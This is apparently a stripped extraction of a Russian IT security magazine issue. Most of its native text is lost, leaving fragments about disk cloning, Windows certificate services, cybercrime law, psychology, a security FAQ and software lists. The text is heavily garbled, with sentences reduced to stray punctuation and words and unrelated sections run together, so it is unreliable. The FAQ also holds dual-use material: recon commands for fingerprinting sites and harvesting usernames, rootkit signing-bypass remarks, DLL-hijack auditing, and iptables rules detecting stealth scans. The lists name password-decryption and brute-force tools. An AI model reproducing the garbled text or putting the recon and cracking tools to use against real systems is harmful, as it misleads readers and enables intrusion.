Ext2, Ext3, Ext4, ReiserFS,
Reiser4, XFS, JFS, FAT, NTFS, HFS (MacOS), UFS (FreeBSD,
NetBSD, OpenBSD), VMFS (VMWare ESX),
Linux, MS Windows, Mac OS
(Intel), FreeBSD, NetBSD OpenBSD;
LVM2 (LVM ver 1 );
GRUB 1 2;
Clonezilla SE (Server Edition)
Multicast , ,
PXE Wake-on-LAN;
Clonezilla , .

Debian

clean ,
.
( ), , , ;
dist . , backup,
/home;
cdfs ISO-
(, ISO- );
iso , ISO- ;
[filename.iso] , ISO-,
/home/remastersys.
backup,
, , , . ,
(,
, , , ).
GUI, GUI-
(
,
).

sudo remastersys-gui

LiveUSB Ubuntu , -

Cc

http://clonezilla.org/clonezilla-server-edition/ Clonezilla Server Edition
http://www.cyberciti.biz/tips/download-linuxclonezilla-to-clone-system.html Clonezilla ( )
http://wiki.centos.org/HowTos/PXE/Clonezilla Clonezilla/DRBL- CentOS/Fedora
https://wiki.edubuntu.org/SettingUpClonezillaDRBLonUbuntu Clonezilla/DRBL- Ubuntu
http://www.geekconnection.org/remastersys/ubuntu.html Remastersys Ubuntu

remastersys-gui

LiveUSB

Clonezilla

USB-. ,
(4 , 2 )
Make startup disk.
.

LINUX LIVE: SLACKWARE


Slackware. ,
, Ubuntu, . LiveCD Slackware :
( ) : aufs, squashfs.
,
Linux Live (http://www.linux-live.org). ,
2.6.27.27 i486,
Slackware 64-
. Slackware 13 2.6.33, , ,
, LiveCD . (aufs,
squashfs lzma) Linux Live;
, , man', ;
Linux Live http://www.linux-live.org
/tmp;
.config, ;
./build ( /tmp) root. LiveCD /tmp/live_data_NNNN, NNNN
;
make_iso.sh, ISO- bootinst.sh
LiveUSB.
SUMMARY
, ? Debian
Ubuntu, Remastersys
Backup. , ,
Clonezilla , .
Slackware Live, ,
, , Clonezilla . z

SYN/ACK
luchnik@it-university.ru, www.it-university.ru


AD CS?
CERTIFICATE SERVICES
WINDOWS SERVER 2008 R2 VS. WINDOWS SERVER 2003
, , SSL-, S/MIME- , .
, ,
, Microsoft
Certificate Services.
Windows Server 2008
Active Directory. Active Directory
Certificate Services (AD CS) , ,
. ,
,
. AD CS Windows Server 2008 R2
:
1. Certification authorities (CAs)
(root) (subordinate)
( ),
, .
2. Web enrollment
-.
3. Online Responder .
4. Network Device Enrollment Service (NDES)
.
SCEP (Simple Certificate Enrollment
Protocol), Cisco. NDES IIS
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\MSCEP.
5. Certificate Enrollment Web Service HTTPS.
6. Certificate Enrollment Policy Web Service
HTTPS. , Web Service
AD LDAP.
Windows Server Certificate Services , Certificate
Services CA Certificate Services Web Enrollment Support,
Windows Server 2008 R2.

AD CS
AD CS Itanium Windows Server 2008,
Server Core AD CS , Windows Server 2008 R2.
AD CS Server
2008 ( CA,
Restricted Enrollment Agent ),
R2 (
).
,
CA, Online Responder Web enrollment . AD CS AD DS (Active Directory
Domain Services).
AD CS Server 2008 Server 2008 R2 ,
Windows Server 2003. Certificate
Enrollment Web Services 47 ,
Windows Server 2008 R2. IIS.
AD CS
Server Manager. ,
CAPolicy.inf,
%SYSTEMROOT%.
Certification Authority Certificate Enrollment Web
Service, , CA
Web Service.
Windows Server 2008 COM- ( ICertSrvSetup MSDN),
CA. ,
VBScript.
.
. ,
(HSM). ,
(,
),
, HSM.
Microsoft Windows Server 2003 SP1.
AD CS MMC-, .
, Certificates
(certmgr.msc), Certification Authority (certsrv.msc) Certificate
Templates (certtmpl.msc), certutil.exe certreq.exe.
Online Responder Management (ocsp.msc)
. , Enterprise PKI (pkiview.msc), Windows
Server 2003 Resource Kit PKI Health Tool.
Enterprise PKI
CA, CA, AIA (Authority Information Access) .
PKI. Pkiview ,
CA,
, .
AD CS
Server 2008 R2.
%SYSTEMDRIVE%\ProgramData\Microsoft\Crypto\Keys,
%SYSTEMDRIVE%\Users\All
Users\Microsoft\Crypto\Keys,
.
CA System
State Backup, .
certutil -backupKey
<___> Certification Authority.



,
.
Enterprise CA . Windows
Server 2000 ,
, ,
.
, (certificate autoenrollment) Windows
Server 2003.
Windows Server 2008 3,
CNG (Cryptography Next Generation).
CNG CryptoAPI, CryptoAPI 1.0 ,
,
. , NSA Suite B Cryptography (
)
, Windows Vista. , ,
,
, Windows XP Windows Server 2003,
, RSA, CNG.
- , CSP
(Cryptography Service Provider) -
CNG.

Enterprise Datacenter. Standard
Server 2008 R2.
CA Windows Server 2003.
Windows Server 2008 R2 Windows 7
(Certificate Template API),
.
, , : , .
,

Enterprise PKI
Certificate Enrollment Web Services

.
, . certtmpl.msc,
, ,
(,
, ).

CA
Web Enrollment.

, Certificates.


, ? ,
? , ,
PKCS#10 certreq
CA, ,
. ,
.
,
.
,
CA, -. Web Enrollment, ,
, . XEnroll.dll,

, CertEnroll.dll,
, , . Web
Enrollment PKCS #10 ,
.
Windows Server 2008
Kerberos,
Distributed COM (DCOM).
(autoenrollment) , ,
, , . CA Web Enrollment, Server 2008 R2,
WS-Trust. Certificate
Enrollment Policy Web Service Certificate Enrollment Web Service

HTTPS.
Kerberos, , .
CA
, , ,
, , ,
(renewal-only).
, CA,

VS. ONLINE RESPONDER


.
, ,
, , .

(CRL (certificate revocation list)). ,
,
.
, ,
. (Delta CRL),
,
.
Delta CRL ,
, .
,
, , CRL
.
Windows Server 2008 (Online
Responder). . Online Responder
OCSP (Online Certificate Status Protocol),
RFC 2560. ,

.

, ,
,
.
OCSP , Windows Vista.
(Certificate Path Validation Settings Revocation).
, Online Responder .
:
1. Online Responder AD CS.
Online Responder IIS, .

enrollment policy

AIA Online Responder

Revocation Configuration
2. CA AIA , .
3. ,
Online Responder .
, ,
:
( ), id-pkix-ocsp-nocheck
id-kp-OCSPSigning, CDP AIA.
OCSP Response Signing.
Enterprise CA
Active Directory, (Read Enroll) , Online
Responder. StandAlone CA certutil -v -setreg policy\editflags +EDITF_ENABLEOCSPREVNOCHECK.
Windows Server 2003 .
4. .
Online Responder Management
revocation configuration.
5. Online Responder ,
CA, Online Responder
. CA certutil -setreg ca\UseDefinedCACertInRequest 1.
Online Responder , CA, , .
Windows 2003
OCSP, , CA.

, .

Windows
Server 2008, R2. ,
, ,
, , .
-, . OCSP,
, -
Microsoft. ,
,
,
.
. ,
, ,
.
-, (, Crypto API XEnroll.dll) , -
, .
-, .
,
CA.
,

. z

SYN/ACK
, InfoWatch




. , , , ,
. .

, .
- . , , ... .
, ,
: . ( , ).
(
), , . .
.
, .
.
. . , ,
,
. , .
--- ,
50 ...
.
, ( ), -
. -
, ,
. , , , . ( )
. .

(, ,
,
. Computer drive
licence ).
, () .

- . , , ,
, ( )
, . , ,
, :

.
.


.
, -
,
,
.
, :
. ,
: ,
, .
, ,
. .
. , , :
, , ,
. , .
( ),
( ), .
,
.
. -
IP-
( ,
).
(- )
. , .
, ,
. ,
, . .
, , .
, 272 ( ).

,
. ,
.
(
). , ,
.
IT .
. .
,
.
: - ,
- , - !
XX , . ,
,
, , . ,
-
. .
.
.

. . , . .


(
,
). ,
. 1928 ,
,
, ,
. .
. ,
,
.


. , BSA IFPI,
. .
.
50
(. 7.12
), (. 2-3 . 146 ).
- .
, . .
. .
, , ,
, , (
, ). . ,
. ,
50 000 , , .
, , , . ,
:
. , -
.

.
: ,
. ( , )
.
,
(, ),
(, ), ,
(, , ), .
, , .
.
( ), (

: http://www.internet-law.ru/intlaw/crime/faq.htm).


.
, . - , , .
, ,
. ( )
,
.


.
. ,
. -, MS Office, - -
, SQL-, Java- -
. .
,
(
, . 1295 ). ,
. , , , . , (
) .
.
. 50 000
( ),
.
. , ,
.

(. 1 . 273 )
, .
(. 2 )
.
. ,
-4, .
273- ,
-


,
- ,
http://group.xakep.ru.
! ! ! ,
: lozovsky@gameland.ru
. ,

, ,

, .

.
,
- -
.
, (. 2
. 42 ), .
,
: , ,
, . ,
. .
, 273
,
(
, . ,
).

. ,
KGB Spy.
( ),
! , . ,
, ,
- ,
. ,
, .

,
, ( , , :
http://infowatch.livejournal.com/55585.html). ,
, .
, (, ,
)
. .
.
, .
() . (. 13.11 ).
, . ,
. .
.
(
, , , . 2 . 23 ).
, ICQ -,
,
.
,
/
.
,
. , , ,
. ,
, .
,

. (
) ; ,
IT
( http://forensics.ru/
zi-ts.html).
, - . .
- ,
,
.


, . ,
. , ,
, ,
. ,
.
, ,
.
(. 171 ).
,
, .
: , ,
.

,
, .

,
. ? . ,
. , .
(
) ,

, . ,
. , ,
. . .
.
, .
,
( ).
, DoS-, ,
, . ,
.
.
- , ,
.
. , .
/.
, .
.

.
, -,
,
. ,
, ,
. , . , .
, . , .
. z

UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:


, : ,
, ?

, , ,
, ,
.
,
,

.

. , ,
, , , , , .
, ,
: ,
( ) - ,


; ,
,

, .
,
: ( ), ,
, , , .


, ,
, ,
. , ;
,
.
,
,

,
, ,
.

(phobos)
.
,
, ,
,
.
, ,
, -
( ) ,
, -
. , , ,
.
: , ?
, ,
.
, ,
:
, ,
, .
;
,
, ,
.
, ,
(
), ,

,
, .
- ,
. ,
,
, .

,

.
, ,
, . , .

;


;

.

: ,
, , ,
, ,
.
?
,
(),
, ,
;
,
.
.
,
? -
,
,
,
. .
, - ,
, ,
,
, ,
.

, ,
,
, ,
.
. , ,
,
,
, ,
. (-,
)
.
,
.
,
,
.
,
, ,
; ? ,


. ,
: -


. , , ,
, - ,
, .
, ,
, .
, . :
. , ;
. : , (,
: ,
, ,
); ,
, .
-: , , , .
;
.
, . ,
: , ,
. , ,
, .
, - .
, ,
. : , , , ( ), ( ), ( ). . .
, -. .

,
, , . , ,
, ,
.
, ; (); , ;
; - , , ,
. ,
- , . , , .
. , ,
,
, . ,
, :
, .
, ,
, .
.
( ).
. , ,
: , , ,
, , ,
- ; - ,
. , , , .


.
, ,
.
, , ; , .
homo sapiens, ,
, (),
. ,
,
-
. ,
.

, ,
,

.
,
:
,

, ,
,
. ?

: ;
-


:
.
.
, ,
,
-
. ,
,
,


, : , , .
: ,
. -, .
, ,
? = = .
: ,
, - , , , ,
.
, ,
, . - ,
; - ,
, ; ,
, , , . , .

,
- ;
,
; .
: ,
.

, (
)
, :

.
.
, ,
; ,

,
, .

. ,
: , ,
Joshua Hoffine ,

, ,

:)

PR

.
, ,
?
,
.
, ,
, , , , ,
,
. :


,
- .
.
, , ,
.
,
.
, : ,

: , ,
, ,
,
, .

:


, ,
. ,
, .
.
+ .
( ) + !
, . , .
, .

. ,
.
,
,
,

.
,
-
. , ,
,
.
, ,
,
.

. , ,
, ,
.
,
.

,
.

, ,

.
?

: ,
,

, .
,
, ,
,
(, ). , ,
:
; ,
;
,
, ,

,
. - : ,
:
! ?!
!.
,
: ,
,
,

500 .
, ?
- ,
! ?
30 .. ?
. ?.
,
. ,

,

, , :
.
, ,
,
,
-


, ,
,

.
, , , -,
,
. , ,
-.
,
, ,
, , , - , - , ,

. ,
, ,
.
, , , : ? ,
(- ).
, , - .
,
.
? ,
? , , ?
, , . !
,
, ,
. (,
,
),
,
.
, , ,
.

, ,
, ,
, ,
. , ,
,
, :


, ,

1. ,
.
, ,
.
,
.
,
,
, .
. , anyway
,
- .
2.
:
, ?.

. : , ,
:
;
, , ;
.
3. . ,

, ,
. ,

.
:
. ,
.
.
4.
. ,
, ,
-
.
5. ,
, ,
. ,
.
: . ,
:). z

UNITS
ant

faq
united
@real.xakep.ru

Q: ,

Q: -

, , -

CMS.

A: ,
,

. . Whatweb (www.morningstarsecurity.com/research/whatweb)
- ,
(CMS), , JavaScript, .. ,
- ,
,
-,
..
250 , CMS . , WordPress,
,
WordPress wp-content.
,
:

A:
.
,
,
URL.
, , CeWL (www.digininja.org/projects/cewl.php), ,
.
:), . Userpass.py (www.pauldotcom.com/userpass.py)
Python, Google
Linkedin.com, CeWL. facebook,
myspace ..,
. :

$ ./whatweb www.morningstarsecurity.com

$ python userpass.py "name".

name ,
(

). :
g ,

;
s (,
/ , security);
m , CeWL.
, . ,
.
Q: x64?
A:
. : .
, TDL3,

, . , TDL3

(
www.nobunkum.ru/issue003/tdss-botnet).
Win7 x64
,
.
, ,
, .
(Disable PatchGuard & Driver signature enforcement) x64
. TDL4
MBR
.
,
Mebroot. , ,
x64 .
Q: ,
DLL-?

A: .

LoadLibrary.
DLL
, Windows

( DLL).
DLL,
.
DLL,
Windows
DLL. DLL DLL LoadLibrary
LoadLibraryEx.
, .
.
16- .
Windows.
.
,
.
.
DLL,
,
.

, .
.
. , .
Windows
DLL
. DLL

.

DLL. API
SetDllDirectory (""). DLL
, LoadLibrary
HDD
. , LoadLibrary
DLL
Windows. ,
.
Windows, ,

.

LoadLibrary,
DLL
SetDllDirectory(""),


SetDllDirectory("__").
Q: ?

A: schannel.dll, .

,
, Windows.
DWORD retval = SearchPath(NULL, "schannel", ".dll", err, result, NULL);
HMODULE handle = LoadLibrary(result);


,
,
LoadLibrary().
,

.
, .
HMODULE handle = LoadLibrary("schannel.dll");

Q: ,

?

A: -Microsoft
Process Monitor,

. Process
Monitor (http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx) ,
.
, . , ,

.
Process Monitor ,
.
.
Metasploit Ruby DLLHijackAuditKit (http://bit.ly/DLLHijackAuditKit)
.
:
DLLHijackAuditKit;
procmon.exe
( Process Monitor);
Ruby (rubylang.org).
Start
Command Prompt with Ruby,
DLLHijackAuditKit.

,
.
i386
2-100- ,
.
Q: PDF-. .

ProcMon' DLL Injection


audit.bat
! ,
,
CSV- ProcMon'.

.
DLLTest
ruby generate.rb.
Q: Nmap?
A: Nmap
,
.
TCP-,
. -
(, )
-
,
firewall'.
:
iptables -A INPUT -p tcp --tcp-flags ACK,FIN FIN -j LOG --log-prefix "Stealth scan"
iptables -A INPUT -p tcp --tcp-flags ACK,FIN FIN -j DROP

--tcp-flags ACK,FIN FIN TCP-.


(ACK,FIN)
, , (FIN)
, .
, ,
FIN-, ACK. TCP-

,
.
Q:
?

A: , Windows : , . -
GParted (LiveCD Linux'),
.
,
.
HDD,

BootIt. , Vista/Windows7 , .
:

Flip Removable Bit.

. , (,
),
. ,
,
- .
Q: Python?
, .

A: PDFiD (blog.didierstevens.com/programs/pdf-tools) , PDF-
, ;
PDF-parser
PDF ( );
Origami Walker (security-labs.org/origami)
PDF-;
Origami pdfscan ;
Origami extractjs Jsunpack-n's pdf.py JavaScript- PDF-;
Sumatra PDF (blog.kowalczyk.info/software/sumatrapdf) MuPDF (ccxvii.net/mupdf) , ,
, ;
Malzilla (www.malzilla.org)
PDF,
JavaScript;
Jsunpack-n (jsunpack.blogspot.com/2009/06/jsunpack-n-updates-for-pdf-decoding.html)
JavaScript
PCAP--,
PDF-.
Q: ,
Google ? c Picasa Web.

A: , googlecl
(code.google.com/p/googlecl),

. :
Blogger:
$ google blogger post --title "foo" "command line posting"
Calendar:
$ google calendar add "Lunch with Jim at noon tomorrow"
Contacts:
$ google contacts list name,email > contacts.csv
Google Docs:
$ google docs edit --title "Shopping list"
Picasa:
$ google picasa create --title "Cat Photos" ~/photos/cats/*.jpg
Youtube:
$ google youtube post --category Education killer_robots.avi

, .
?

A: . Psyco (psyco.sourceforge.net)
, Python


Google Data API Windows,
Linux. z
>Misc
AltDrag 0.8
Camouflage v1.2.1
Daphne 1.47
FilerFrog 2.0.0
Find and Run Robot 2.90
Grindstone 2
HashTab 3.0
KeyPass 4.9.8
NirCmd 2.41
RegSeeker 1.55
Synchronicity 4.3
Synergy 1.3.4
System Silencer 1.2
True Launch Bar 4.4.13 RC

>Games
GunGirl 2 v1.11

Python:
ActivePython 2.7.0.2
Eric5 5.0.2
geany 0.19.1
IronPython 2.6.1
Jython 2.5.2b1
Komodo Edit 5.2.4
Komodo Edit 6.0.0b3
Komodo IDE 5.2.4
Komodo IDE 6.0.0b3
Portable Python 1.1
Pydev for Eclipse 1.6.1
PyScripter v2.2a
Python 2.7
Python 2.7 x64
Python 3.1.2
Python 3.1.2 x64
Spyder 1.1.4
Wing IDE 101 3.2.10
Wing IDE Professional 3.2.10
Wing IDE Professional 4.0.0b4

>Development
ClickHeat 1.10
ECMerge 2.2
UltraEdit 16.20.0
WinAppDbg 1.4

>System
AstroGrep 4.1.4
Auslogics Disk Defrag 3.1.8.150
Auslogics Registry Cleaner 2.0.4.40
BlueScreenView v1.28
CCleaner 2.35
Comodo Internet Security (32bit) 5.0
CrystalDiskMark 3.0.0g
Driver Magician 3.5
Emsisoft HiJackFree 4.0
FreeApps v1.0
GMER 1.0.15.15281
Open Hardware Monitor 0.1.37 Beta
Process Hacker 2.3
PWGen 2.04
Sandboxie 3.48
SetupBatteryCare 0.98
Speccy 1.04
SUMo 2.10.0.95
TechPowerUp GPU-Z v0.3.6

>Security
ChromePasswordDecryptor 1.6
DLLHijackAuditKit v2
DllHijackAuditor 1.0
DynamicLoadLibraryTest
ExploitMyUnion 2.1
FirePassword 3.6
FOCA Free 2.5.2
IEPasswordDecryptor 1.6
Nikto 2.1.3
NmapSI4
OperaPasswordDecryptor 1.0
ProcNetMonitor
RIPS 0.32
Vera 0.20
Wireshark 1.4.0
xsser 0.7a

>Net
Ad Muncher v4.9 Beta Build 32193
BluetoothView 1.40
digsby Build 82 Beta
gpg4win 2.1.0
Home Ftp Server 1.11.0.146
LanTopolog 2.05
Pidgin for Windows 2.7.3
QIP 2010 Build 4000
Skype 5.0 beta 2
TeamSpeak Client for Windows
3.0.0 Beta
TekSIP 2.9
Visual Router
µTorrent 2.2beta

>Multimedia
AnyToISO
DualVR 1.7.3
Format Factory 2.5
Greenshot 0.8.0
Picasa for Windows 3.8 Build 115.45
ProgDVB 6.46.4
Songbird 1.8.0
VideoInspector 2.2.6.124
VLC (VideoLAN) for Windows 1.1.4

>Net
Balsa 2.3.28
Claws Mail 3.7.6
Deluge 1.2.2
Drivel 3.0.2
gnash 0.8.8
Google Chrome 5.0.375.127
Lightspark 0.4.3
Links 2.3
Midori 0.2.7
Mitter 0.4.5
Mozilla Firefox 3.6.8
OpenMeetings 1.2
Opera 10.61
Qwit 1.1

>Games
ManiaDrive 1.2

>Devel
ATI Stream SDK 2.2
boost 1.44.0
Fructose 0.9.0
Clojure 1.2
DrPython 3.11.3
GNU make 3.82
iText 5.0.4
MongoDB 1.6.0
Myjit 0.5.0.1
Nitro++ 1.3.39
PixelLight 0.9.2
Poppler 0.14.2
Ruby 1.9.2
SCons 2.0.1
Sdcc 2.9.0
Vaadin 6.4.3
WebIssues 0.9.6
Whoosh 0.3.18
Wt 3.1.4
ZinjaI 20100829

>>UNIX
>Desktop
Adobe Reader 9.3.4
amaroK 2.3.1
Audacious 2.4
Boxee 0.9.22.13
Cairo-dock 2.1.3
DigiKam 1.4.0
Droid 0.2.1
Feh 1.9
GCstar 1.6.1
Glippy 0.0.6.4
Imagination 2.1.1
Inkscape 0.48
KMyMoney 4.5
KOffice 2.2.2
Lifeograph 0.5.6
QGIS 1.5
QtiPlot 0.9.8.1
Shotwell 0.7.0
Vim 7.3
VLC 1.1.4
Webilder 0.6.9

Virtual Router

>System
ATI Catalyst 10.8
Bluez-tools 0.1.18
CDEmu 1.3.0
CLIcompanion 1.0
dd_rescue 1.20
Iptables 1.4.9
Linux Kernel 2.6.35.4
NTFS-3G 2010.8.8
PCSX-Reloaded 1.9.92
q4wine 0.119
SBackup 0.11.1
Smb4k 0.10.8
VirtualBox 3.2.8
Wine 1.3.0
Xorg server 1.9.0
ZFS 0.5

>Server
Apache 2.2.26
BIND 9.7.1
CUPS 1.4.4
DBMail 2.2.16
DHCP 4.2.0
Dovecot 2.0.0
Ejabberd 2.1.5
Freeradius 2.1.9
HAproxy 1.4.7
Lighttpd 1.4.28
MySQL 5.1.50
Nsd 3.2.6
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.3
Ora2Pg 6.3
Postfix 2.7
Samba 3.5.4
Squid 3.1.7
Vsftpd 2.3.2

>Security
CeWL 3.0
Clamav 0.96.2
Cvechecker 0.5
DotDotPwn 1.0
Firewall Builder 4.1.1
FuzzDiff
Graudit 1.7
Halberd 0.2.4
Listener 2.0.0
Nufw 2.4.3
RSMangler 1.1
Sipwitch 0.9.1
ssh2ftpcrack 2.0
Suricata 1.0.1
Voidssh
WhatWeb 0.4.5
Wireshark 1.2.10
Wpbruteforcer

RabbitMQ 2.0.0
RadioTray 0.6
RSSOwl 2.0.5
Seesmic 0.8
TeamViewer 5.0.8252
Vuze 4.5

>>WINDOWS
>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.4.1225
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.4.1
Firefox 3.6.8
foobar2000 1.1
K-Lite Mega Codec Pack 6.3.0
Miranda IM v0.9.2
Notepad++ 5.7
Opera 10.61
PuTTY 0.60
Skype 4.2
Sysinternals Suite
Total Commander 7.55
Unlocker 1.9.0
XnView 1.97.6
UNITS

HTTP:// WWW2

PAYONEER

www.payoneer.com
: ?. (GetAFreelancer,
RentACoder, oDesk, eLance)
. ,
Payoneer (www.payoneer.com),
.
.
Payoneer,
. Payoneer
PayPal, .

TORRENTZ

.torrent

www.torrentz.com
- , .torrent - Google .torrent.

torrentdownloads.net. ,
torrent-.
torrentz.com isohunt.com.
.torrent
. , ,
: torrtilla.ru, 2torrents.org,
kinobaza.tv.

HOW SECURE IS MY PASSWORD?
www.howsecureismypassword.net

: ,
,
.
. , ,
, .
howsecureismypassword.net, gfhjkm (
) ,
PC 30 . :
, .
#R00t$H3ll 195 , , ,
abcdefg1234567 5722 .

IORAD

www.iorad.com
, - .
, ,
, , , .
,
- IORAD.
,
Capture.